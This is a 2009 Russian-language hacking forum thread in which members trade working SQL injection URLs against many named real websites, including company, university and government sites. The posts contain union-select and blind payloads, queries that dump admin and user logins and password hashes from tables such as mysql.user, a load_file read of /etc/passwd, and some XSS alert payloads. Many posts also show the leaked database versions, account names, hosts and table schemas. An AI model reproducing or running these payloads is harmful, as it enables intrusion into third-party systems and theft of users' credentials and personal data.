http://www.lifelinebatteries.com/marineflyer.php?id=-3+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Database Version: 5.0.45
Database name: batteries
User name: concorde_lynda@localhost
beerhack
10.07.2009, 16:20
PR 6
BLIND
https://www.calico.org/page.php?id=1'+and+substring(version(),1,1)=5/*
Krist_ALL
10.07.2009, 16:22
http://krasotaspb.ru/services/news/article.php?ID=-13236+union+select+1,2,3,4,5,6,login,8,9,password+ from+b_user+limit+105,1
Соц сеть какая то недоделаная. Пр 2 . 5я ветка.
Акков около 2200
+++AndreyDevil+++
10.07.2009, 16:52
http://www.anca.org/press_releases/press_releases.php?prid=1541+and+substring(version (),1,1)=3
http://avtodeti.ru
Портал о безопасности детей на дорогах
http://avtodeti.ru/?t=-73+union+select+1,2,concat(login,char(58),password ),4,5,6,7,8,9,10,11+from+admin--
==========
http://avtodeti.ru/?t=-73+union+select+1,2,concat(memberName,char(58),pas swd,char(58),passwordSalt,char(58),emailAddress),4 ,5,6,7,8,9,10,11+from+smf_members+limit+0,1--
beerhack
10.07.2009, 17:54
PR 5
http://www.irs-net.de/kontakt/mitarbeiter.php?id=1+union+select+1,2,3,4,5,6,7,8, 9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,p assword))),17,18,19,20,21+from+mysql.user+limit+0, 1/*
Database Version: 4.1.11-log
Database name: web
User name: root@www5.shuttle.de
Skofield
10.07.2009, 21:03
PR 5
http://www.digitallyobsessed.com/displaypr.php?ID=-608+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,version(),27,28,29 ,30,31,32,33,34,35,36+from+users--
Database Version: 5.0.81-community
Database name: bobftp_obsessed
User name: bobftp_king@localhost
http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+1,2,3,4,5,6,7,CONCAT (Version(),Database(),User()),9,10,11--
Database Version: 5.0.67-log
Database name: u158438
User name: u158438@10.10.10.212
http://www.belsoft.ru/index.php?cont=prices&page=a&dob=2&id=21085+limit+0+UNION+SELECT+CONCAT((SELECT+CONCA T(converge_id,converge_pass_hash,converge_pass_sal t)+FROM+u158438.ibf_members_converge+LIMIT+2,1)),2 ,3,4,5,6,7,8,9,10,11--
админка
http://www.belsoft.ru/forum/admin.php
HAXTA4OK
11.07.2009, 08:36
http://ru.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5
ЗЫ еще xss Напишу
http://ru.tv-mis.com./titul.php?id=%20%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E =)
####################################
http://www.kokomansion.tv/showvideos.php?id=-1+union+select+1,concat(0x3a,user(),version(),data base()),3,4,5,6,7,8,9--
kokouser@localhost5.0.45kokomansiondb
ЗЫ еще xss Напишу
http://www.kokomansion.tv/showvideos.php?id=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E
####################################
http://www.oreol.tv/services/channel.php?id=1+and+substring(version(),1,1)=5--
Krist_ALL
11.07.2009, 13:53
http://www.gtbike.ru/articles.php?menu_id=38&razd_id=0&pg=1&id=-60+union+select+1,2,3,version(),5,6,7,8,9 PR 4
http://www.wavplanet.com/wavs.php?cat=5+union+select+1,concat(version(),dat abase(),user()),3,4,5,6,7--
4.0.17-standard-log wavplanet root@192.168.2.11
[PR 6]
http://www.dacc.edu/news/index.php?id=-503+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,94.1.21-standard:news:public@localhost
==============================
[PR 4]
http://www.laererportalen.dk/kalender.php?id=-547+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,105.1.35:laererportal:l aererportal_u@localhost
==============================
[PR 4]
http://www.szgl.at/kalender.php?id=-28+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,64.0.23-Max-log:d00942bb:d00942bb@localhost
==============================
[PR 3]
http://www.futter-fuers-volk.de/kalender.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,225.0.51a-3ubuntu5.1:usr_web68_2:web68@localhost
==============================
[PR 3]
http://www.b-b-z.nl/jubileum/kalender.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,75.0.51a-3ubuntu5.4:b_b_z:b-b-z@localhost
==============================
[PR 2]
http://www.alexandra-ihrig.de/kalender.php?id=-12+union+select+concat_ws(0x3a,version(),database( ),user()),2,3,44.0.27-max-log:db196773590:dbo196773590@212.227.127.40
==============================
[PR 0]
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())5.0.81-1-log:neo24:neo24@squid.srv.sin.khk.be
http://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,us er_password)+from+phoenix_phpbb_usershttp://neo24.sin.khk.be/phoenix/kalender.php?id=-73+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword)+from+tbl_users
Krist_ALL
11.07.2009, 19:23
http://www.radioworld.ca/information.php?info_id=-45+union+select+1,2,3+from+admin+--
4я версия
db_info:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,concat_ws(0x0b,version(), user(),database()),6,7--+
5.0.32-Debian_7etch8
snt-nmu@localhost
snt-nmu
tables:
http://snt-nmu.kiev.ua/?l=ukr&p=scientific_groups&group=-10'+union+select+1,2,3,4,group_concat(0x0b,column_ name),6,7+from+information_schema.columns+where+ta ble_name=0x7373735f70616e656c--+
id,
u_f_ukr,
u_i_ukr,
u_o_ukr,
u_f_rus,
u_i_rus,
u_o_rus,
u_f_en,
u_i_en,
u_login,
u_password,
u_session,
u_putdate,
u_number,
u_foto,
u_post_ukr,
u_post_rus,
u_post_en,
u_faculty,
u_entered_year,
u_group,
u_hobby_group,
u_about_sw,
u_home_address,
u_home_phone,
u_mobile_phone,
u_email,
u_icq,
u_url,
u_birthday,
u_sex,
u_date,
u_last_update,
u_ip,
u_graduated,
u_council,
u_order
ЗЫ: сайт на одном сервере с "инъектором" (inj3ct0r.com)
blind
http://www.hopewell-precision.com/product.php?prod_id=5+AND+ascii(lower(substring(da tabase(),1,1)))>1
stan12187@localhost
stan121871
5.1.22-log
nemaniak
12.07.2009, 02:02
blind PR4
http://www.pollanetsquad.it/attore.asp?cod_att=2150+and+ascii(substring((conca t_ws(char(58),user(),database(),version())),1,1))>1
Sql135947@%:Sql135947_1:5.0.68-log
http://www.baltimorebrass.net/index.php?cat=5+UNION+SELECT+1,2,3,4,CONCAT(Versio n(),Database(),User()),6,7--
67-communitybaltim4_websitebaltim4_wsclient@localhost
beerhack
12.07.2009, 10:19
http://www.n-rabota.ru/resume/post.php?id=1+union+select+1,2,version(),4,5,6,7,8 ,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
Database Version: 5.0.81
Database name: n-rabota
User name: n-rabota@localhost
http://www.winnersport.ru/main.php?s=catalog&id=-627+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8--
http://www.oil.se/article.php?sub=0§ion=6&id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),version(),user()),7,8,9--
http://znamiarodiny.artmiem.ru/main.php?id=15+union+select+1,2,concat_ws(0x3a,dat abase(),version(),user()),4,5,6--
http://www.librasdeamor.org/help.php?IdPage=-15+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,datab ase(),version(),user()),9,10,11--
http://www.thakornkit.com/new.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user())--
вывод в тег img
Skofield
12.07.2009, 16:01
http://www.bulletinpa.com/index.php?id=-907+union+select+1,2,3,4,5,6,7,8,9/*
blind
---------------------------------------------------------------------------------------------------------
http://travel.emeraldcoast.com/article.php?id=-175+union+select+1,version(),3,4,5,6,7,8,9,0,11,12 ,13,14,15,16,17,18,19,20,21/*
Database Version: 5.0.26-standard-log
Database name: iansawesomedb
User name: isH4X0r@cyclone.emeraldcoast.com
---------------------------------------------------------------------------------------------------------
http://www.stormbringer.at/news.php?id=-3706'+union+select+1,2,3,4,5,admin_id,7,8,9,0,11,1 2,13+from+admin/*
Database Version: 5.0.45
Database name: usr_web5_1
User name: web5@localhost
HAXTA4OK
12.07.2009, 21:23
http://www.ibnlokmat.tv/gallery.php?id=1&conid=-57082+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7--
5.0.27-standard-log:lokmat@172.29.11.1:ibnlokmat
####################################
http://wcha.tv/live.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9--
5.0.22-Debian_0ubuntu6.06.10-log:site_wcha_tv:wcha@64.73.77.67
####################################
http://www.tv-portal.ru/index.php?kanal=-339+union+select+1,2,concat_Ws(0x3a,database(),use r(),version()),4,5,6,7,8,9,10,11&stat-id=1
db_kokos32_2:dbu_kokos32_1@192.168.7.9:4.1.22
####################################
http://laurabenjamin.tv/video.php?id=1§ion=1+union+select+1,concat_ws(0x3a,user(),dat abase(),version()),3,4,5--
LBTV@208.109.181.196:LBTV:4.1.22-max-log
####################################
PR: 5
http://www.fabawards.tv/view-fabawards-2009show.php?id=1'+union+select+1,concat_ws(0x3a,u ser(),database(),version()),3+from+mysql.user+--+
All_DB_Admin@localhost:fabawards:5.0.83-rs
вывод в пути картинки..есть mysql.user...путь так и не нашел (((
####################################
http://www.na.owns.tv/index.php?page=userprofile&id=-1'+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28+/*+
naownstv@localhost:naownstv-web:4.1.20
####################################
http://www.tv-live.ro/radio-live.php?id=-1+UnIoN+SeLeCT+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6--
tvlive@localhost:tvlive_db:5.0.67-community.jpg
####################################
http://ua.tv-mis.com/titul.php?id=1+and+substring(version(),1,1)=5--
####################################
PR 3
http://www.supplyanddemand.tv/show_news.php?id=-1+union+select+1,2,concat_Ws(0x3a,database(),user( ),version()),4--
supplyd:supplyd@localhost:4.0.25
####################################
http://www.vehiclegraphics.tv/view.php?id=1'+and+substring(version(),1,1)=5+/*+
####################################
http://www.lancs.tv/index.php?PHPSESSID=urewmdaiezvwdmn&p=page&id=-1+union+select+1,2,concat_Ws(0x3a,user(),database( ),version())--
lccc-root@localhost:lancstv:5.0.51b-log
####################################
http://www.famicomdojo.tv/subscription.php?id=1+union+select+1,2,3,4,5,6,7,8 ,concat_Ws(0x3a,user(),database(),version()),10,11 ,12,13,14,15,16,17--
tfboogaloo@logic:FamicomDojo:5.0.37-standard
http://www.catan.ro/index.php?pagina=stire&id=-43+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4
Database Version: 4.1.22-standard-log
Database name: catanro_catan
User name: catanro_catan@localhost
Os : pc-linux-gnu
Staratel
12.07.2009, 23:13
1)ребята подскажите какую нибудь прогу сканнер sql, чтобы ссама бегала по сайту подставляя ковычки в переменные в поисках мускл ошибок.
2) И ещё оч прошу покажите на примере урла как правильно заюзать в update
Изменить значений переменных в базу с sql inj запроса.
Спасиб большое.
mssql
[PR 5]
http://www.coveredbridges.com/events/annualEvents.asp?id=1+or+1=@@version--Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
====================================
[PR 4]
http://www.anconia.com/support/faq.asp?id=1218+or+1=@@version--Microsoft SQL Server 2005 - 9.00.4207.00 (Intel X86) Dec 17 2008 14:34:38 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
====================================
====================================
[PR 6]
http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12
4.0.21:juristenverband:root@localhost http://www.juristenverband.at/kalender.php?id=-137+union+select+1,2,3,4,5,concat_ws(0x3a,user,pas sword,file_priv),7,8,9,10,11,12+from+mysql.user=== =================================
[PR 3]
http://www.werkensepolder.nl/kalender.php?id=-24+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6,74.0.15:werkense:werkense@loca lhost
====================================
[PR 2]
http://www.beitstadfjordmc.no/applic/kalender.php?id=-21+union+select+concat_ws(0x3a,version(),database( ),user())
5.0.32-Debian_7etch10-log:beitstadfjordmc:beitstadfjordmc@srv85.one.com
====================================
[PR 2]
http://www.svenarum.nu/kalender.php?id=-1011+union+select+1,2,3,4,5,concat_ws(0x3a,version (),database(),user()),7,8,95.0.27:svenarum_nu:sven arum.nu@localhost
====================================
[PR 1]
http://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,135.0.32-Debian_7etch10-log:db1073307-judy:dbu1073307@localhosthttp://www.judyreynolds.com/en/kalender.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass ,admin),6,7,8,9,10,11,12,13+from+user============= =======================
[PR 1]
http://www.vvvolkegem.be/kalender.php?ID=-11+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10--4.1.22-standard:voevol06_volkegem:voevol06_43sj29a@localh ost
====================================
[PR 0]
http://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,55.0.37-standard:tarsforier_wolk:tarsforier_tf@localhostht tp://www.donkerewolk.net/kalender.php?id=-22+union+select+1,2,concat_ws(0x3a,user_id,usernam e,userpass),4,5+from+poll_user==================== ================
[PR 0]
http://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5, concat_ws(0x3a,version(),database(),user()),7,8,9, 10,11,12,13,14,15,16--&month=65.0.32-Debian_7etch5-log:usr_web0_1:web0@localhosthttp://www.h-lebt.de/kalender.php?id=9999999999+union+select+1,2,3,4,5, concat_ws(0x3a,username,password),7,8,9,10,11,12,1 3,14,15,16+from+be_users--&month=6
beerhack
13.07.2009, 00:47
http://provympel.ru/index3.php?id=56+union+select+1,version(),3,4--
Database Version: 5.0.81-community
Database name: magics_complex
User name: magics_tester@localhost
giant.md
Это кагбе самые крутые лесапеды в молдове :D
http://www.giant.md/news.php?id=-17%20UNION%20SELECT%20CONCAT_WS(0x3a,DATABASE(),US ER(),VERSION()),2,3,4--
13404:13404@localhost:5.0.77
таблы (колонки)
cat_velo (id, category, type, year, razmer_rami, rama, vilka, z_perecl, p_perecl, manetki, shatuni, pedali, ruli, vinos, rulevaia_kolonka, ru4ki_tormoza, p_tormoz, z_tormoz, sedlo, podsedelinii_shtir, oboda, p_vtulka, z_vtulka, pokrishki, spitsi, karetka, tsepi, kasseta, kolvo_skorostei, exact_name, color, picture, description, price)
categories (id, name, text, picture, big_text, big_picture, width, type)
contact (id, name, email, topic, msg)
fish_config (id, name, value, description, code)
fish_feedback (id, name, email, msg, dat)
fish_labels (id, param, value, code)
fish_language (id, value, language)
fish_news (id, title, text, picture, active, dat, code)
fish_photoalbum (id, title_en, descr_en, title_md, descr_md, title_ru, descr_ru, folder, active)
fish_sections (id, value, name_en, name_ru, name_md, active)
fish_service (id, title, text, picture, price, dat, code, active)
fish_tips (id, text, picture, dat, code, active)
guest (id_msg, name, city, email, url, msg, answer, puttime, hide)
news (id, title, picture, preview, text, date, time)
pro_accessories (id, category, name, art_no, picture, price, descr)
proposals (id, title, picture, descr, date, active)
secret_agents (id, login, password)
service (id, name, value)
shimano_parts (id, category, name, art_no, picture, price, descr, bike_type, ride_type)
silver_djs (id, name, photo_small, photo_big, bday, contacts, about)
silver_news (id, title, pic_small, pic_big, preview, text, date, time)
silver_posters (id, title, text, from_date, to_date, added)
silver_progs (id, title, descr, djs)
silver_schedule (id, id_prog, weekday, begin, end)
stat_global (id, razdel, visits, month)
stat_razdel (id, id_user, razdel, dat)
stat_users (id, ip, sid, dat)
wp_comments (comment_ID, comment_post_ID, comment_author, comment_author_email, comment_author_url, comment_author_IP, comment_date, comment_date_gmt, comment_content, comment_karma, comment_approved, comment_agent, comment_type, comment_parent, user_id)
wp_links (link_id, link_url, link_name, link_image, link_target, link_category, link_description, link_visible, link_owner, link_rating, link_updated, link_rel, link_notes, link_rss)
wp_options (option_id, blog_id, option_name, option_value, autoload)
wp_postmeta (meta_id, post_id, meta_key, meta_value)
wp_posts (ID, post_author, post_date, post_date_gmt, post_content, post_title, post_category, post_excerpt, post_status, comment_status, ping_status, post_password, post_name, to_ping, pinged, post_modified, post_modified_gmt, post_content_filtered, post_parent, guid, menu_order, post_type, post_mime_type, comment_count)
wp_term_relationships (object_id, term_taxonomy_id, term_order)
wp_term_taxonomy (term_taxonomy_id, term_id, taxonomy, description, parent, count)
wp_terms (term_id, name, slug, term_group)
wp_usermeta (umeta_id, user_id, meta_key, meta_value)
wp_users (ID, user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name)
гаф
http://www.vidol.gov/dol_news_detail.php?detail_id=38'+union+select+1,l oad_file('/etc/passwd'),3,4+limit+1,1/*
жаль,что мускуль на другом хосте..=)
version 5.0.45-log
Skofield
13.07.2009, 15:44
http://www.praguepubs.co.uk/pubs_details.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,0,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39+from+information_schema.tables--
5.0.77-community-log:ppubs_ppubs:ppubs_prague@localhost
beerhack
13.07.2009, 16:20
blind, version: 5
http://www.perquimanscountync.gov/index.php?page=commissioners&id=6+and+substring(version(),1,1)=5--&mode=printminutes
PR 5
http://www.stikom.edu/v8/main.php?act=lay&goto=jurnal_detil&id=-28+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5--
T74113_stikomedu:5.0.51a-24+lenny1:t74113_nuansajp@localhost
PR 5
http://www.ecodelaware.com/place.php?id=313+union+select+1,concat_ws(0x3a,use rname,password),3+from+Users--
---
http://knowyou.ru/send.php?id=-10908+union+select+1,concat_ws(0x3a,database(),ver sion(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--
http://www.artafisha.ru/place.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),version(),user()),7--
http://www.gilishproekt.ru/Objects/place.php?id=-179+union+selecT+1,2,3,4,5,concat_ws(0x3a,database (),version(),user())--
http://a-sib.ru/hot.php?id=-68+union+select+1,2,3,4,concat_ws(0x3a,database(), version(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--
http://fanboys.dreamhosters.com/index.php?blog=-74+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8--&comic=327
PR5
www.hcjz.hr
http://www.hcjz.hr/clanak.php?id=-12521+union+select+concat_ws(0x3a,user(),version() ,database(),11111111111111111111111)/*
ДБ: hcjz@asc203.t-com.hr:5.0.45:hcjz
Путь: /users1/hcjz/public_html/
Табличко: jos_users
+++AndreyDevil+++
14.07.2009, 05:04
http://www.washingtoninstitute.org/templateC05.php?CID=-2550'+union+select+1,2,3,4,5,version(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22--+
5.0.67-log
winep2_2@localhost
winep2_production
PR5
www.lakberendezes.hu
http://www.lakberendezes.hu/magazin/mutat.php?id=-462+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
ДБ: 5.0.32-Debian_7etch5-log:lakber:lakberftp@localhost
Путь: /home/dv/users/lakberendezes/www/
Табличко: admin && users
HAXTA4OK
14.07.2009, 10:17
http://www.bacchus.tv/index/wine2.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.67:bacchus_bacchus:bacchus_bacchus@localhost
####################################
http://www.toddlevi.tv/gotw_display.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8/*
5.0.27:toddlevi:toddlevi@localhost
####################################
ТИЦ: 40
PR: 4
http://www.hypocrisy.tv/mediaplayer/videos.php?id=-1+union+select+concat_Ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9--
penetralia@crenshaw.dreamhost.com:penetralia:5.0.6 7-userstats-log
####################################
http://philmadelphia.tv/portfolio/motion.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
4.1.25-Debian_mt1:db20241_kelly:db20241@64.13.232.43
####################################
Я ТОЖЕ УБИЛ КЕННИ :D
http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,concat_Ws(0x3a,v ersion(),database(),user()),4,5,6,7,8,9,10,11--
5.0.68-log:southparasql:southparasql@10.0.65.22
tables:
punbb_censoring,sptv_temp,punbb_groups,wa_admin,pu nbb_reports,pmnl_archives,wa_forbidden_ext,punbb_s ubscriptions,pmnl_sub,wa_log_files,sptv_referer,pu nbb_config,videos,punbb_online,wa_auth_admin,punbb _search_cache,pmnl_config,wa_joined_files,punbb_to pics,pmnl_temp,wa_session,sptv_referer_out,sptv_re ferer_site,punbb_forum_perms,wa_abo_liste,punbb_po sts,wa_ban_list,punbb_search_matches,pmnl_email,wa _liste,punbb_users,punbb_bans,sptv_referer_toplist ,punbb_forums,wa_abonnes,punbb_ranks,wa_config,pun bb_search_words,pmnl_listsconfig,wa_log,ratings,pu nbb_categories
user_tables: punbb_users :)
http://www.southpark-tv.com/episode.php?id=1+union+select+1,2,group_concat(con cat_Ws(0x3a,username,password)),4,5,6,7,8,9,10,11+ from+punbb_users--
http://www.sale-info.ru/lot.php?id=-227+union+select+1,2,3,4,5,7,8,9,10,concat_ws(0x3a ,database(),version(),user()),12,13--
u19167:5.0.67-log:u19167@10.10.153.166
http://www.region-oz.ru/home.php?id=-10+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20--
regionoz_baze:5.0.32-Debian_7etch1-log:regionoz_baze@77.221.130.9
AlexSatter
14.07.2009, 12:27
http://www.allnovgorod.ru/show-kino.php?id=-9+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19
5.0.81-community-log:allnovgo_allnovg@localhost:allnovgo_site
http://menticid.com/entertainment/kino.php?id=-54+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
4.0.27-max-log:dbo30998491@212.227.109.166:db30998491
http://www.wathne-realty.ru/pages/house.php?id=-218+union+select+1,2,concat_ws(0x3a,database(),ver sion(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21--
http://www.mxshop.ru/goods.php?id=1437+union+select+1,2,3,4,concat_ws(0 x3a,database(),version(),user()),6,7,8+limit+1,1--
http://9984899.ru/house.php?id=-122+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,database(),version(),user())--
http://www.riphopkins.com/view-work.php?id=-1+union+select+1,2,3,4,5,6,7,concat(database(),0x3 a,version(),0x3a,user()),9--
http://www.macso.ru/day.php?id=14+union+select+1,2,concat_ws(0x3a,data base(),version(),user())+limit+1,1--
http://www.helpatwork.se/work.php?subpage=6&id=1+union+select+concat_ws(0x3a,database(),versio n(),user()),2--
---
mailbrush
14.07.2009, 15:51
Давненько я тут не постил...
http://bikez.com/msgboard/msg.php?id=22048+and+null+union+select+unhex(hex(c oncat_ws(0x3a,user(),database(),version()))),2,3,4&type=bikehholm@localhost:hholm:4.1.1
Pashkela
14.07.2009, 19:49
Итальянский аналог журнала ][:)
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1'
Could not query categorie parm SELECT * FROM nuke_phpbb_categories WHERE cat_id=1\'
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1+and+substring(version(),1,1)=5
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1/**/union/**/select/**/1,version(),3,4,5/**/limit/**/1,1/*
http://www.hackerjournal.it/hj/index.php?name=PNphpBB2&file=index&c=1/**/union/**/select/**/1,concat_ws(0x3a,username,user_password),3,4,5+fro m+nuke_phpbb_users/**/limit/**/2,1/*
HAXTA4OK
14.07.2009, 22:23
http://mobile.shortz-tv.com/index.php?p=cat;id=-1'+union+select+concat_ws(0x3a,user(),database(),v ersion())+--+;lng=en
ohmtv@localhost:5.0.51a-24+lenny1-log
####################################
http://www.trace.tv/emission.php?id=1'+union+select+1,concat_ws(0x3a,d atabase(),user(),version()),3,4,5,6,7,8,9,10+/*+
tracetv:tracetv@localhost:5.0.45
####################################
http://www.cinefestbrasil.com/admin2/filmes/tv.php?id=1+and+substring(version(),1,1)=5--
####################################
http://www.studio52.tv/audio_home.php?id=-1+union+select+1,2,3,4,5,6,concat_Ws(0x3a,user(),d atabase(),version()),8,9,10,11,12,13,14
moiz@70.32.76.79:studio52:5.0.37-community-nt
http://www.sportcar-center.com/ru/news.php?type=2&id=-40+union+select+1,2,3,4,concat_ws(0x3a,database(), version(),user())--
u46954:5.0.67-log:u46954@10.10.223.218
http://www.witec.de/en/company/witecnews/news.php?id=-40+union+select+1,2,concat_ws(0x3a,database(),vers ion(),user()),4,5,6--
d004aa52:5.0.45-community-log:d004aa52@localhost
Adm1n4eG
15.07.2009, 02:49
mssql
PR 4
http://www.payglobal.com/index.asp?PID=1+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
PR 5
http://robinzonada.ru/news/index.asp?id=123+or+1=@@version--
Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Web Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2)
HAXTA4OK
15.07.2009, 09:50
http://www.net-tv.at/ikt_videos/show_video.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16--
5.0.75-community-log:nettvat_iktvideos:nettvat@localhost
Skofield
15.07.2009, 11:38
http://www.ufms.spb.ru/fullnews.php?id=-76+union+select+1,version(),3--
Database Version: 5.0.51a-3ubuntu5.4-log
Database name: ufms_spb_ru
User name: ufms_spb_ru@localhost
-----------------------------------------------------------------------------------------------------------
http://www.rossi-potok.ru/page.php?id=-4'+union+select+version()/*
Database Version: 4.0.17
Database name: rossip
User name: rossip@localhost
-----------------------------------------------------------------------------------------------------------
PR 5 ТИЦ 375
http://www.teatrdoc.ru/plays.php?id=-3+union+select+1,version(),3,4,5/*
Database Version: 4.1.22
Database name: kinoteatr_td
User name: kinoteatr_mysql@194.85.92.114
http://www.southernsalestt.com/news.php?id=99999+union+select+1,concat_ws(0x3a,da tabase(),version(),user()),3,4,5,6--
southern_db1:4.1.22-standard:southern_user1@localhost
http://www.rgbinteractive.com/company/news.php?id=99999+union+select+1,2,concat_ws(0x3a, database(),version(),user()),4--
rgb:5.0.45-community-nt:rgb@localhost
Zombi ****
15.07.2009, 17:46
http://fondkadyrova.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--
и хз шо оно сиптом прошолся результатов не дало кто поможет?
DezMond™
15.07.2009, 18:45
http://stroyshop.info/news/arhive.php?id_groups=44+union+select+1,2,3,4,versi on
(),6,7,8,9,10,11,12,13+/*+&typenews=1
4.1.25
http://www.detali.ru/cat/oem_NI1.asp?Serie=B14**'&Year=1999&B=-
S'+UnIon+SeLecT+1,2,user,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21+--+&E=GA16DE
InfoViewer
http://www.xenon55.ru/?did=-47+union+select+1,2,3,4,5,6,7,database
(),9,10,11,12,13,14,15,16,17,18,19,20,21,22+--
u38955
Вот ишо:
http://www.genoterra.ru/news/comment.php?id=-5+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12--
http://www.harrowgatehillfuture.co.uk/gill/comment.php?ID=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6--
http://www.udka.ru/comment.php?id=-999+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--
http://www.registrazii.net/comment.php?id=-999+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.projectconversation.com/projectnostalgia/comment.php?ID=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--
http://www.bedroomconfession.com/comment.php?id=5+union+select+1,concat_ws(0x3a,ver sion(),database(),user()),3--
http://www.analisi.ru/info.php?id=-8+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4--
http://www.ambler-soft.ru/info.php?section=dsp&id=-999+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5--
HAXTA4OK
16.07.2009, 09:51
http://www.adpv.com/marketplace-tv.php?id=-1+and+1=1+UnIoN+SeLeCT+concat_ws(0x3a,version(),us er(),database()),2,3,4,5,6,7,8,9+from+mysql.user--
5.1.34-community-log:user@213.195.76.70:adpv
phpinfo:
http://www.adpv.com/phpinfo.php
есть mysql.user и путь ...(( тока вот прав на запись нету (
mailbrush
16.07.2009, 12:13
